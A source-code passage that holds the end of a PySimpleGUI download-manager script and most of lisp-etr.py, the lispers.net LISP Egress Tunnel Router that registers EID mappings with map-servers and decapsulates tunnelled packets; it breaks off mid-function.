dlpath = dlPopup(loadedTextURL)
if not dlpath is None:
with open(dlpath, 'w') as f:
f.write(value['-OUTPUT-'])
elif event == 'Clear Cache':
cache = {}
try:
message = gui_queue.get_nowait()
except queue.Empty: # get_nowait() will get exception when Queue is empty
message = None # break from the loop if no more messages are queued up
# if message received from queue, display the message in the Window
if message:
window.FindElement('-DOWNLOADS-').update(value='')
if sg.popup_yes_no('Finished downloading {}. Would you like to open the downloaded file?'.format(message)):
os.startfile(message)
window.FindElement('-CACHE-').update(value='{} menu{} in cache.'.format(len(cache), plural(len(cache))))
window.close()
|
lisp-etr.py
|
#-----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-etr.py
#
# This file performs LISP Egress Tunnel Router (ETR) functionality.
#
# -----------------------------------------------------------------------------
from future import standard_library
standard_library.install_aliases()
from builtins import str
import lisp
import lispconfig
import socket
import select
import threading
import time
import struct
from subprocess import getoutput
import os
try:
import pytun
except:
pytun = None
#endtry
#------------------------------------------------------------------------------
#
# Global data structures relative to the lisp-etr process.
#
lisp_register_timer = None
lisp_trigger_register_timer = None
lisp_etr_info_timer = None
lisp_ephem_socket = None
lisp_ephem_port = lisp.lisp_get_ephemeral_port()
lisp_ipc_listen_socket = None
lisp_send_sockets = [None, None, None]
lisp_raw_socket = None
lisp_l2_socket = None
lisp_mac_header = None
LISP_MAP_REGISTER_INTERVAL = 60 # In units of seconds
#
# Test mode. Allows a batch of database-mapping commands to be read from
# lisp.config before any Map-Registers are sent. When an EID 'eid-done' is
# found (which is placed as the last database-mapping command in lisp.config),
# then lisp_build_map_register() is called via the 5-second delay timer.
#
lisp_etr_test_mode = (os.getenv("LISP_ETR_TEST_MODE") != None)
lisp_seen_eid_done = False
#------------------------------------------------------------------------------
#
# lisp_etr_map_server_command
#
# Configure a Map-Server and trigger ETR functionality.
#
def lisp_etr_map_server_command(kv_pair):
global lisp_trigger_register_timer
global lisp_etr_info_timer
ms = lispconfig.lisp_map_server_command(kv_pair)
#
# Trigger a Info-Request if we are doing NAT-traversal if this is the
# first Map-Server..
#
first_ms = (len(lisp.lisp_map_servers_list) == 1)
if (first_ms):
ms = list(lisp.lisp_map_servers_list.values())[0]
lisp_etr_info_timer = threading.Timer(2, lisp_etr_process_info_timer,
[ms.map_server])
lisp_etr_info_timer.start()
else:
#
# Trigger Map-Register to newly configured Map-Server.
#
# Do not trigger Map-Register if NAT-traveral is configured. We may not
# have the global RLOC yet from Info-Replies. When the Info-Reply comes
# in we do trigger Map-Registers to all map-servers.
#
if (lisp.lisp_nat_traversal): return
if (ms and len(lisp.lisp_db_list) > 0):
lisp_build_map_register(lisp_send_sockets, None, None, ms, False)
#endif
#endif
#
# Do not start the trigger timer if we are in test-mode. We may already
# be sending a huge list of Map-Registers after "eid-done".
#
if (lisp_etr_test_mode and lisp_seen_eid_done): return
#
# Handle case where "lisp database-mapping" comes before "lisp map-server"
# in configuration file. We have to start periodic timer.
#
if (len(lisp.lisp_db_list) > 0):
if (lisp_trigger_register_timer != None): return
lisp_trigger_register_timer = threading.Timer(5,
lisp_process_register_timer, [lisp_send_sockets])
lisp_trigger_register_timer.start()
#endif
#enddef
#
# lisp_etr_database_mapping_command
#
# This function supports adding additional RLOCs to a database-mapping entry
# that already exists.
#
def lisp_etr_database_mapping_command(kv_pair):
global lisp_register_timer, lisp_trigger_register_timer
global lisp_send_sockets, lisp_seen_eid_done
global lisp_seen_eid_done_count
#
# This is to fix an issue with the same set of database-mappings being
# sent a second time. Only in test-mode we don't want to dup process for
# large numbers of entries.
#
if (lisp_seen_eid_done): return
lispconfig.lisp_database_mapping_command(kv_pair, lisp_ephem_port,
(lisp_etr_test_mode == False))
#
# Trigger Map-Register when all databaase-mappings are configured.
#
# Do not trigger Map-Register if NAT-traveral is configured. We may not
# have the global RLOC yet from Info-Replies. When the Info-Reply comes
# in we do trigger Map-Registers to all map-servers.
#
if (lisp.lisp_nat_traversal): return
if (lisp_trigger_register_timer != None): return
#
# Wait until a large set of database-mapping commands are processed
# before sending the first set of Map-Registers. Used in test mode only.
#
if (lisp_etr_test_mode):
db_size = len(lisp.lisp_db_list)
if (db_size % 1000 == 0):
lisp.fprint("{} database-mappings processed".format(db_size))
#endif
db = lisp.lisp_db_list[-1]
if (db.eid.is_dist_name() == False): return
if (db.eid.address != "eid-done"): return
lisp_seen_eid_done = True
lisp.fprint("Finished batch of {} database-mappings".format(db_size))
t = threading.Timer(0, lisp_process_register_timer,
[lisp_send_sockets])
lisp_register_timer = t
lisp_register_timer.start()
return
#endif
if (len(lisp.lisp_map_servers_list) > 0):
lisp_trigger_register_timer = threading.Timer(5,
lisp_process_register_timer, [lisp_send_sockets])
lisp_trigger_register_timer.start()
#endif
#enddef
#
# lisp_etr_show_command
#
# Show ETR configured map-servers and database-mappings.
#
def lisp_etr_show_command(clause):
#
# Show local found RLOCs.
#
output = lispconfig.lisp_show_myrlocs("")
#
# Show decapsulation stats.
#
output = lispconfig.lisp_show_decap_stats(output, "ETR")
#
# Show configured map-servers.
#
dns_suffix = lisp.lisp_decent_dns_suffix
if (dns_suffix == None):
dns_suffix = ":"
else:
dns_suffix = " (dns-suffix '{}'):".format(dns_suffix)
#endif
hover = "{} configured map-servers".format(len(lisp.lisp_map_servers_list))
title = "LISP-ETR Configured Map-Servers{}".format(dns_suffix)
title = lisp.lisp_span(title, hover)
hover = ("P = proxy-reply requested, M = merge-registrations " + \
"requested, N = Map-Notify requested")
reg_title = lisp.lisp_span("Registration<br>flags", hover)
output += lispconfig.lisp_table_header(title, "Address", "Auth-Type",
"xTR-ID", "Site-ID", reg_title, "Map-Registers<br>Sent",
"Map-Notifies<br>Received")
for ms in list(lisp.lisp_map_servers_list.values()):
ms.resolve_dns_name()
ms_name = "" if ms.ms_name == "all" else ms.ms_name + "<br>"
addr_str = ms_name + ms.map_server.print_address_no_iid()
if (ms.dns_name): addr_str += "<br>" + ms.dns_name
xtr_id = "0x" + lisp.lisp_hex_string(ms.xtr_id)
flags = "{}-{}-{}-{}".format("P" if ms.proxy_reply else "p",
"M" if ms.merge_registrations else "m",
"N" if ms.want_map_notify else "n",
"R" if ms.refresh_registrations else "r")
registers_sent = ms.map_registers_sent + \
ms.map_registers_multicast_sent
output += lispconfig.lisp_table_row(addr_str,
"sha1" if (ms.alg_id == lisp.LISP_SHA_1_96_ALG_ID) else "sha2",
xtr_id, ms.site_id, flags, registers_sent,
ms.map_notifies_received)
#endfor
output += lispconfig.lisp_table_footer()
#
# Show database-mappings configured.
#
output = lispconfig.lisp_show_db_list("ETR", output)
#
# Show ELP configuration, if it exists.
#
if (len(lisp.lisp_elp_list) != 0):
output = lispconfig.lisp_show_elp_list(output)
#endif
#
# Show RLE configuration, if it exists.
#
if (len(lisp.lisp_rle_list) != 0):
output = lispconfig.lisp_show_rle_list(output)
#endif
#
# Show JSON configuration, if it exists.
#
if (len(lisp.lisp_json_list) != 0):
output = lispconfig.lisp_show_json_list(output)
#endif
#
# Show group-mappings, if they exist.
#
if (len(lisp.lisp_group_mapping_list) != 0):
title = "Configured Group Mappings:"
output += lispconfig.lisp_table_header(title, "Name", "Group Prefix",
"Sources", "Use MS")
for gm in list(lisp.lisp_group_mapping_list.values()):
sources = ""
for s in gm.sources: sources += s + ", "
if (sources == ""):
sources = "*"
else:
sources = sources[0:-2]
#endif
output += lispconfig.lisp_table_row(gm.group_name,
gm.group_prefix.print_prefix(), sources, gm.use_ms_name)
#endfor
output += lispconfig.lisp_table_footer()
#endif
return(output)
#enddef
#
# lisp_etr_show_keys_command
#
# Call lispconfig.lisp_show_crypto_list().
#
def lisp_etr_show_keys_command(parameter):
return(lispconfig.lisp_show_crypto_list("ETR"))
#enddef
#
# lisp_group_mapping_command
#
# Process the "lisp group-mapping" command clause.
#
def lisp_group_mapping_command(kv_pairs):
sources = []
group_prefix = None
rle_address = None
ms_name = "all"
for kw in list(kv_pairs.keys()):
value = kv_pairs[kw]
if (kw == "group-name"):
group_name = value
#endif
if (kw == "group-prefix"):
if (group_prefix == None):
group_prefix = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
#endif
group_prefix.store_prefix(value)
#endif
if (kw == "instance-id"):
if (group_prefix == None):
group_prefix = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
#endif
group_prefix.instance_id = int(value)
#endif
if (kw == "ms-name"):
ms_name = value[0]
#endif
if (kw == "address"):
for source in value:
if (source != ""): sources.append(source)
#endfor
#endif
if (kw == "rle-address"):
if (rle_address == None):
rle_address = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
#endif
rle_address.store_address(value)
#endif
#endfor
gm = lisp.lisp_group_mapping(group_name, ms_name, group_prefix, sources,
rle_address)
gm.add_group()
return
#enddef
#
# lisp_build_map_register_records
#
# Build EID and RLOC records to be inserted in a Map-Register message.
#
def lisp_build_map_register_records(quiet, db, eid, group, ttl):
#
# Don't include RTR-list if there is no NAT in the path but nat-traversal
# is configured and NAT in path is tested. When there is a NAT, include
# all RTRs if lisp_register_all_rtrs is configured. Otherwise, if the
# array element is None, then the RTR is down and should be excluded in
# the list to register.
#
rtr_list = {}
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
for rtr_str in lisp.lisp_rtr_list:
rtr = lisp.lisp_rtr_list[rtr_str]
if (lisp.lisp_register_all_rtrs == False and rtr == None):
lisp.lprint(" Exclude unreachable RTR {}".format( \
lisp.red(rtr_str, False)))
continue
#endif
if (rtr == None): continue
rtr_list[rtr_str] = rtr
#endif
break
#endfor
count = 0
eid_records = b""
for iid in [eid.instance_id] + eid.iid_list:
eid_record = lisp.lisp_eid_record()
eid_record.rloc_count = len(db.rloc_set) + len(rtr_list)
eid_record.authoritative = True
eid_record.record_ttl = ttl
eid_record.eid.copy_address(eid)
eid_record.eid.instance_id = iid
eid_record.eid.iid_list = []
eid_record.group.copy_address(group)
eid_records += eid_record.encode()
if (not quiet):
prefix_str = lisp.lisp_print_eid_tuple(eid, group)
decent_index = ""
if (lisp.lisp_decent_pull_xtr_configured()):
decent_index = lisp.lisp_get_decent_index(eid)
decent_index = lisp.bold(str(decent_index), False)
decent_index = ", decent-index {}".format(decent_index)
#endif
lisp.lprint(" EID-prefix {} for ms-name '{}'{}".format( \
lisp.green(prefix_str, False), db.use_ms_name, decent_index))
eid_record.print_record(" ", False)
#endif
for rloc_entry in db.rloc_set:
rloc_record = lisp.lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.local_bit = rloc_entry.rloc.is_local()
rloc_record.reach_bit = True
eid_records += rloc_record.encode()
if (not quiet): rloc_record.print_record(" ")
#endfor
#
# If we are doing NAT-traversal, include a set or RTR RLOCs with
# priority 1. And set the global RLOCs to priority 254.
#
for rtr in list(rtr_list.values()):
rloc_record = lisp.lisp_rloc_record()
rloc_record.rloc.copy_address(rtr)
rloc_record.priority = 254
rloc_record.rloc_name = "RTR"
rloc_record.weight = 0
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.local_bit = False
rloc_record.reach_bit = True
eid_records += rloc_record.encode()
if (not quiet): rloc_record.print_record(" RTR ")
#endfor
#
# Return to caller number of EID records written to returned buffer.
#
count += 1
#endfor
return(eid_records, count)
#enddef
#
# lisp_build_map_register
#
# From each configured "database-mapping" command, register mappings to
# configured map-servers.
#
def lisp_build_map_register(lisp_sockets, ttl, eid_only, ms_only, refresh):
#
# No database-mapping entries.
#
if (eid_only != None):
db_list_len = 1
else:
db_list_len = lisp.lisp_db_list_length()
if (db_list_len == 0): return
#endif
if (lisp_etr_test_mode):
lisp.fprint("Build Map-Register for {} database-mapping entries". \
format(db_list_len))
else:
lisp.fprint("Build Map-Register for {} database-mapping entries". \
format(db_list_len))
#endif
#
# Set boolean if "decentralized-pull-xtr-[modulus,dns-suffix]" configured.
#
decent = lisp.lisp_decent_pull_xtr_configured()
#
# Go quiet with debug output when there are a lot of EID-records.
#
quiet = (db_list_len > 12)
ms_list = {}
if (decent):
#
# If "decentralized-pull-xtr-[modulus,dns-suffix]" is configured,
# decide which map-server this EID belongs too (and is registered with.
#
for db in lisp.lisp_db_list:
eid = db.eid if db.group.is_null() else db.group
dns_name = lisp.lisp_get_decent_dns_name(eid)
ms_list[dns_name] = []
#endfor
else:
#
# Set up each map-server names so we can decide which EID-prefixes go
# to which map-servers. [0] is eid_records and [1] is count.
#
for ms in list(lisp.lisp_map_servers_list.values()):
if (ms_only != None and ms != ms_only): continue
ms_list[ms.ms_name] = []
#endfor
#endif
#
# Create data structure instances to build Map-Regiser message.
#
map_register = lisp.lisp_map_register()
map_register.nonce = 0xaabbccdddfdfdf00
map_register.xtr_id_present = True
map_register.use_ttl_for_timeout = True
if (ttl == None): ttl = lisp.LISP_REGISTER_TTL
#
# Traverse the databas-mapping associative array.
#
mtu = 65000 if (lisp_etr_test_mode) else 1100
for db in lisp.lisp_db_list:
if (decent):
ms_dns_name = lisp.lisp_get_decent_dns_name(db.eid)
else:
ms_dns_name = db.use_ms_name
#endif
#
# Is db entry associated with a map-server name that is not
# configured?
#
if (ms_dns_name not in ms_list): continue
msl = ms_list[ms_dns_name]
if (msl == []):
msl = [b"", 0]
ms_list[ms_dns_name].append(msl)
else:
msl = ms_list[ms_dns_name][-1]
#endif
#
# If dynamic-EIDs are discovered, add each of them to EID-records,
# unless, we are doing a trigger in which case a single dynamic-EID
# is built into an EID-record.
#
# Otherwise, add static EID-prefixes into EID-records, unless a single
# one is triggered.
#
eid_records = b""
if (db.dynamic_eid_configured()):
for dyn_eid in list(db.dynamic_eids.values()):
eid = dyn_eid.dynamic_eid
if (eid_only == None or eid_only.is_exact_match(eid)):
records, count = lisp_build_map_register_records(quiet, db,
eid, db.group, ttl)
eid_records += records
msl[1] += count
#endif
#endfor
else:
if (eid_only == None):
if (ttl != 0): ttl = db.register_ttl
eid_records, count = lisp_build_map_register_records(quiet, db,
db.eid, db.group, ttl)
msl[1] += count
#endif
#endif
#
# Add EID-records to correct map-server name set.
#
msl[0] += eid_records
if (msl[1] == 20 or len(msl[0]) > mtu):
msl = [b"", 0]
ms_list[ms_dns_name].append(msl)
#endif
#endfor
#
# Send Map-Register to each configured map-server.
#
sleep_time = .500 if (lisp_etr_test_mode) else .001
count = 0
for ms in list(lisp.lisp_map_servers_list.values()):
if (ms_only != None and ms != ms_only): continue
ms_dns_name = ms.dns_name if decent else ms.ms_name
if (ms_dns_name not in ms_list): continue
for msl in ms_list[ms_dns_name]:
#
# Build map-server specific fields.
#
map_register.record_count = msl[1]
if (map_register.record_count == 0): continue
map_register.nonce += 1
map_register.alg_id = ms.alg_id
map_register.key_id = ms.key_id
map_register.proxy_reply_requested = ms.proxy_reply
map_register.merge_register_requested = ms.merge_registrations
map_register.map_notify_requested = ms.want_map_notify
map_register.xtr_id = ms.xtr_id
map_register.site_id = ms.site_id
map_register.encrypt_bit = (ms.ekey != None)
if (ms.refresh_registrations):
map_register.map_register_refresh = refresh
#endif
if (ms.ekey != None): map_register.encryption_key_id = ms.ekey_id
packet = map_register.encode()
map_register.print_map_register()
#
# Append EID-records and encode xtr-ID and site-ID at end of
# Map-Register.
#
trailer = map_register.encode_xtr_id(b"")
eid_records = msl[0]
packet = packet + eid_records + trailer
ms.map_registers_sent += 1
lisp.lisp_send_map_register(lisp_sockets, packet, map_register, ms)
count += 1
if (count % 100 == 0 and lisp_etr_test_mode):
sleep_time += .1
lisp.fprint("Sent {} Map-Registers, ipd {}".format(count,
sleep_time))
#endif
time.sleep(sleep_time)
#endfor
if (lisp_etr_test_mode):
lisp.fprint("Sent total {} Map-Registers".format(count))
#endif
#
# Do DNS lookup for Map-Server if "dns-name" configured.
#
ms.resolve_dns_name()
#
# Exit loop if we are triggering a Map-Register to a single
# Map-Server.
#
if (ms_only != None and ms == ms_only): break
#endfor
return
#enddef
#
# lisp_etr_process_info_timer
#
# Time to send a periodic Info-Request message. This must be done less often
# then sending periodic Map-Registers as well as less the the NAT timeout
# value which is usually one minute.
#
def lisp_etr_process_info_timer(ms):
global lisp_etr_info_timer
global lisp_ephem_socket
lisp.lisp_set_exception()
#
# Build Info-Request messages if we have any private RLOCs in database-
# mappings.
#
sockets = [lisp_ephem_socket, lisp_ephem_socket, lisp_ipc_listen_socket]
lisp.lisp_build_info_requests(sockets, ms, lisp.LISP_CTRL_PORT)
#
# Build Info-Request for RTRs so we can open up NAT state so RTRs
# can encapsulate to us when ETR is behind NAT.
#
allow_private = (os.getenv("LISP_RTR_BEHIND_NAT") == None)
for rtr in list(lisp.lisp_rtr_list.values()):
if (rtr == None): continue
if (rtr.is_private_address() and allow_private == False):
r = lisp.red(rtr.print_address_no_iid(), False)
lisp.lprint("Skip over RTR private address {}".format(r))
continue
#endif
lisp.lisp_build_info_requests(sockets, rtr, lisp.LISP_DATA_PORT)
#endfor
#
# Restart periodic timer. For some reason only this timer has to be
# canceled. Found on while testing NAT-traversal on rasp-pi in Jul 2015.
#
lisp_etr_info_timer.cancel()
lisp_etr_info_timer = threading.Timer(lisp.LISP_INFO_INTERVAL,
lisp_etr_process_info_timer, [None])
lisp_etr_info_timer.start()
return
#enddef
#
# lisp_process_register_timer
#
# Time to send a periodic Map-Register.
#
def lisp_process_register_timer(lisp_sockets):
global lisp_register_timer, lisp_trigger_register_timer
global lisp_ephem_socket
lisp.lisp_set_exception()
#
# Build and send Map-Register.
#
lisp_build_map_register(lisp_sockets, None, None, None, True)
#
# If we are are doing L2-overlays, then register as a join of the
# broadcast MAC address.
#
if (lisp.lisp_l2_overlay):
entry = [ None, "ffff-ffff-ffff", True ]
lisp_send_multicast_map_register(lisp_sockets, [entry])
#endif
#
# If trigger timer called this function, clear it out and only use it
# when a new map-server of database-mapping is configured.
#
if (lisp_trigger_register_timer != None):
lisp_trigger_register_timer.cancel()
lisp_trigger_register_timer = None
#endif
#
# Restart periodic timer.
#
if (lisp_register_timer): lisp_register_timer.cancel()
lisp_register_timer = threading.Timer(LISP_MAP_REGISTER_INTERVAL,
lisp_process_register_timer, [lisp_send_sockets])
lisp_register_timer.start()
return
#enddef
#
# lisp_send_multicast_map_register
#
# Build a Map-Register message with a Multicast Info Type LCAF as an EID-record
# for each entry in the 'entries' array. And build an RLOC-record as an RLE
# describing this ETR as the RLOC to be used for replication.
#
# The entries is an array of (source, group, joinleave) tuples.
#
def lisp_send_multicast_map_register(lisp_sockets, entries):
length = len(entries)
if (length == 0): return
afi = None
if (entries[0][1].find(":") != -1): afi = lisp.LISP_AFI_IPV6
if (entries[0][1].find(".") != -1): afi = lisp.LISP_AFI_IPV4
if (entries[0][1].find("-") != -1): afi = lisp.LISP_AFI_MAC
if (afi == None):
lisp.lprint("lisp_send_multicast_map_register() invalid group address")
return
#endif
#
# Find all (*,G) entries in entries array and replace with (S,G) entries
# from lisp_group_mapping_list. The comment to avoid the source check
# is there so we can build a g_entry that can validate against group
# mappings. Have to fix to allow different sources for the same G when
# (S,G) is reported.
#
g_entries = []
for source, group, joinleave in entries:
# if (source != None): continue
g_entries.append([group, joinleave])
#endfor
decent = lisp.lisp_decent_pull_xtr_configured()
ms_list = {}
entries = []
for group, joinleave in g_entries:
ms_gm = lisp.lisp_lookup_group(group)
if (ms_gm == None):
lisp.lprint("No group-mapping for {}, could be underlay group". \
format(group))
continue
#endif
lisp.lprint("Use group-mapping '{}' {} for group {}".format( \
ms_gm.group_name, ms_gm.group_prefix.print_prefix(), group))
iid = ms_gm.group_prefix.instance_id
ms_name = ms_gm.use_ms_name
rle = ms_gm.rle_address
#
# To obtain decent-index for a group address, just use group address
# and no source as part of hash. Because an ITR does not know if (*,G)
# or (S,G) is registered with the mapping system
#
key = ms_name
if (decent):
key = lisp.lisp_get_decent_dns_name_from_str(iid, group)
ms_list[key] = [b"", 0]
#endif
if (len(ms_gm.sources) == 0):
entries.append(["0.0.0.0", group, iid, key, rle, joinleave])
continue
#endif
for s in ms_gm.sources:
ms_list[key] = [b"", 0]
entries.append([s, group, iid, key, rle, joinleave])
#endfor
#endfor
length = len(entries)
if (length == 0): return
lisp.lprint("Build Map-Register for {} multicast entries".format(length))
#
# Build RLE node for RLOC-record encoding. If behind a NAT, we need to
# insert a global address as the RLE node address. We will do that in
# the entries for loop.
#
rle_node = lisp.lisp_rle_node()
rle_node.level = 128
translated_rloc = lisp.lisp_get_any_translated_rloc()
rle = lisp.lisp_rle("")
rle.rle_nodes.append(rle_node)
#
# Set up each map-server names so we can decide which EID-prefixes go
# to which map-servers. [0] is eid_records and [1] is count. The ms_list
# is already setup for when pull-based decent is used.
#
if (decent == False):
for ms in list(lisp.lisp_map_servers_list.values()):
ms_list[ms.ms_name] = [b"", 0]
#endfor
#endif
rloc_name = None
if (lisp.lisp_nat_traversal): rloc_name = lisp.lisp_hostname
#
# Count number of RTRs reachable so we know allocation count.
#
rtr_count = 0
for rtr in list(lisp.lisp_rtr_list.values()):
if (rtr == None): continue
rtr_count += 1
#endfor
#
# Run through multicast entry array.
#
eid_records = b""
for source, group, iid, ms_dns_name, rle_addr, joinleave in entries:
#
# Is db entry associated with a map-server name that is not configured?
#
if (ms_dns_name not in ms_list): continue
eid_record = lisp.lisp_eid_record()
eid_record.rloc_count = 1 + rtr_count
eid_record.authoritative = True
eid_record.record_ttl = lisp.LISP_REGISTER_TTL if joinleave else 0
eid_record.eid = lisp.lisp_address(afi, source, 0, iid)
if (eid_record.eid.address == 0): eid_record.eid.mask_len = 0
eid_record.group = lisp.lisp_address(afi, group, 0, iid)
if (eid_record.group.is_mac_broadcast() and \
eid_record.eid.address == 0): eid_record.eid.mask_len = 0
decent_index = ""
ms_name = ""
if (lisp.lisp_decent_pull_xtr_configured()):
decent_index = lisp.lisp_get_decent_index(eid_record.group)
decent_index = lisp.bold(str(decent_index), False)
decent_index = "with decent-index {}".format(decent_index)
else:
decent_index = "for ms-name '{}'".format(ms_dns_name)
#endif
eid_str = lisp.green(eid_record.print_eid_tuple(), False)
lisp.lprint(" EID-prefix {} {}{}".format(eid_str, ms_name,
decent_index))
eid_records += eid_record.encode()
eid_record.print_record(" ", False)
ms_list[ms_dns_name][1] += 1
#
# Build our RLOC entry.
#
rloc_record = lisp.lisp_rloc_record()
rloc_record.rloc_name = rloc_name
#
# Decide on RLE address. Have NAT-traversal take precedent, otherwise
# use configured RLE in group-mapping. If one wasn't configured use
# lisp_myrlocs IPv4 address.
#
if (translated_rloc != None):
rle_node.address = translated_rloc
elif (rle_addr != None):
rle_node.address = rle_addr
else:
rle_node.address = rle_addr = lisp.lisp_myrlocs[0]
#endif
rloc_record.rle = rle
rloc_record.local_bit = True
rloc_record.reach_bit = True
rloc_record.priority = 255
rloc_record.weight = 0
rloc_record.mpriority = 1
rloc_record.mweight = 100
eid_records += rloc_record.encode()
rloc_record.print_record(" ")
#
# If we are doing NAT-traversal, include a set or RTR RLOCs with
# priority 1. And set the global RLOCs to priority 254.
#
for rtr in list(lisp.lisp_rtr_list.values()):
if (rtr == None): continue
rloc_record = lisp.lisp_rloc_record()
rloc_record.rloc.copy_address(rtr)
rloc_record.priority = 254
rloc_record.rloc_name = "RTR"
rloc_record.weight = 0
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.local_bit = False
rloc_record.reach_bit = True
eid_records += rloc_record.encode()
rloc_record.print_record(" RTR ")
#endfor
#
# Add EID-records to correct map-server name set.
#
ms_list[ms_dns_name][0] += eid_records
#endfor
#
# Build map-server independent fields.
#
map_register = lisp.lisp_map_register()
map_register.nonce = 0xaabbccdddfdfdf00
map_register.xtr_id_present = True
map_register.proxy_reply_requested = True
map_register.map_notify_requested = False
map_register.merge_register_requested = True
#
# Send Map-Register to each configured map-server.
#
for ms in list(lisp.lisp_map_servers_list.values()):
key = ms.dns_name if decent else ms.ms_name
#
# Get EID-records from correct map-server name set.
#
if (key not in ms_list): continue
#
# Build map-server specific fields.
#
map_register.record_count = ms_list[key][1]
if (map_register.record_count == 0): continue
map_register.nonce += 1
map_register.alg_id = ms.alg_id
map_register.alg_id = ms.key_id
map_register.xtr_id = ms.xtr_id
map_register.site_id = ms.site_id
map_register.encrypt_bit = (ms.ekey != None)
packet = map_register.encode()
map_register.print_map_register()
#
# Append EID-records and encode xtr-ID and site-ID at end of
# Map-Register.
#
trailer = map_register.encode_xtr_id(b"")
packet = packet + eid_records + trailer
ms.map_registers_multicast_sent += 1
lisp.lisp_send_map_register(lisp_sockets, packet, map_register, ms)
#
# Do DNS lookup for Map-Server if "dns-name" configured.
#
ms.resolve_dns_name()
#
# Go build more EID-records.
#
time.sleep(.001)
#endfor
return
#enddef
#
# lisp_etr_data_plane
#
# Capture a LISP encapsulated packet, decap it, process inner header, and
# re-encapsulated it.
#
def lisp_etr_data_plane(parms, not_used, packet):
global lisp_ipc_listen_socket, lisp_send_sockets
device = parms[0]
lisp_raw_socket = parms[1]
#
# Jump over MAC header if packet received on interface. There is a 4-byte
# internal header in any case (loopback interfaces will have a 4 byte
# header)..
#
if (lisp.lisp_is_macos() == False):
offset = 4 if device == "lo0" else 16
packet = packet[offset::]
#endif
#
# Check IGMP packet.
#
protocol = struct.unpack("B", packet[9:10])[0]
if (protocol == 2):
entries = lisp.lisp_process_igmp_packet(packet)
if (type(entries) != bool):
lisp_send_multicast_map_register(lisp_send_sockets, entries)
return
#endif
#endif
#
# Check RLOC-probe Map-Request. We need to grab the TTL from IP header.
#
orig_packet = packet
packet, source, port, ttl = lisp.lisp_is_rloc_probe(packet, 0)
if (orig_packet != packet):
if (source == None): return
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port, ttl)
return
#endif
#
# First check if we are assembling IPv4 fragments. Do this only when
# not doing NAT-traversal. Otherwise, the kernel will do it when we
# receive the same packet on a raw socket (in lisp_etr_nat_data_plane()).
#
if (struct.unpack("B", packet[0:1])[0] & 0xf0 == 0x40):
sport = socket.ntohs(struct.unpack("H", packet[20:22])[0])
if (lisp.lisp_nat_traversal and sport == lisp.LISP_DATA_PORT): return
packet = lisp.lisp_reassemble(packet)
if (packet == None): return
#endif
packet = lisp.lisp_packet(packet)
status = packet.decode(True, lisp_ipc_listen_socket, lisp.lisp_decap_stats)
if (status == None): return
#
# Print some useful header fields.
#
packet.print_packet("Receive", True)
#
# If we are looping back Map-Registers via encapsulation, overwrite
# multicast address with source address. That means we are sending a
# Map-Register message to the lisp-core process from our local RLOC
# address to our local RLOC address. Also, zero out the UDP checksum
# since the destination address changes that affects the pseudo-header.
#
if (lisp.lisp_decent_push_configured and
packet.inner_dest.is_multicast_address() and \
packet.lisp_header.get_instance_id() == 0xffffff):
source = packet.inner_source.print_address_no_iid()
packet.strip_outer_headers()
packet = packet.packet[28::]
packet = lisp.lisp_packet_ipc(packet, source, sport)
lisp.lisp_ipc(packet, lisp_ipc_listen_socket, "lisp-ms")
return
#endif
#
# Check if inner packet is a LISP control-packet. Typically RLOC-probes
# from RTRs can come through NATs. We want to reply to the global address
# of the RTR which is the outer source RLOC. We don't care about the
# inner source port since the RTR will decapsulate a data encapsulated
# RLOC-probe Map-Reply. The inner LISP header begins at offset 20+16+28=64
# (outer-IPv4 + UDP-outer-LISP + inner-IPv4-UDP).
#
if (packet.lisp_header.get_instance_id() == 0xffffff):
inner_ip = packet.packet[36::]
inner_lisp = inner_ip[28::]
ttl = -1
if (lisp.lisp_is_rloc_probe_request(inner_lisp[0:1])):
ttl = struct.unpack("B", inner_ip[8:9])[0] - 1
#endif
source = packet.outer_source.print_address_no_iid()
lisp.lisp_parse_packet(lisp_send_sockets, inner_lisp, source, 0, ttl)
return
#endif
#
# Packets are arriving on pcap interface. Need to check if another data-
# plane is running. If so, don't deliver duplicates.
#
if (lisp.lisp_ipc_data_plane):
lisp.dprint("Drop packet, external data-plane active")
return
#endif
#
# Increment global stats.
#
lisp.lisp_decap_stats["good-packets"].increment(len(packet.packet))
#
# Strip outer headers and start inner header forwarding logic.
#
packet.strip_outer_headers()
f_or_b = lisp.bold("Forward", False)
#
# Process inner header (checksum and decrement ttl).
#
igmp = False
L2 = packet.inner_dest.is_mac()
if (L2):
packet.packet = lisp.lisp_mac_input(packet.packet)
if (packet.packet == None): return
f_or_b = lisp.bold("Bridge", False)
elif (packet.inner_version == 4):
igmp, packet.packet = lisp.lisp_ipv4_input(packet.packet)
if (packet.packet == None): return
if (igmp):
entries = lisp.lisp_process_igmp_packet(packet.packet)
if (type(entries) != bool):
lisp_send_multicast_map_register(lisp_send_sockets, entries)
return
#endif
#endif
packet.inner_ttl = packet.outer_ttl
elif (packet.inner_version == 6):
packet.packet = lisp.lisp_ipv6_input(packet)
if (packet.packet == None): return
packet.inner_ttl = packet.outer_ttl
else:
lisp.dprint("Cannot parse inner packet header")
return
#endif
#
# Check if database-mapping exists for our local destination. When the
# destination is a multicast address, check if the source is our EID.
# That means we sent to a group we are members of. If using an RTR,
# it can't tell since the source RLOC could be rewritten by a NAT so
# the ETR must process the packet. If it decaps, the ITR on this system
# will pcap it and encap again. This will happen until the TTL reaches 0.
#
if (packet.inner_dest.is_multicast_address() == False):
db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db):
db.increment_decap_stats(packet)
else:
lisp.dprint("No database-mapping found for EID {}".format( \
lisp.green(packet.inner_dest.print_address(), False)))
return
#endif
else:
